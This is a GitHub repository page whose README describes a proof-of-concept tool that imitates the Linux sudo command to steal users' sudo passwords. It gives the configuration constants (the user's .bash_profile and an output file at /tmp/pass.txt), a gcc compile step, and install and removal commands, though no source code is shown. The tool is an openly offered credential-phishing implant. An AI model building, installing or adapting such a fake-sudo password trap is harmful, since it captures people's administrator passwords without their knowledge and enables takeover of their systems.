Skip to content
/ sudo Public

mimicate sudo behavior to steal sudo passwords

Notifications You must be signed in to change notification settings

gilelias/sudo

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 

Repository files navigation

sudo phishing

(POC) mimicate sudo behavior to steal sudo passwords..

How to use

  • Edit those consts (if needed)
#define PROFILE_FILE_NAME "/.bash_profile"
#define OUTPUT_FILE_LOCATION "/tmp/pass.txt"
  • Compile the code gcc main.c -o sudo
  • install ./sudo i

How remove it:

  • install ./sudo r

About

mimicate sudo behavior to steal sudo passwords

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages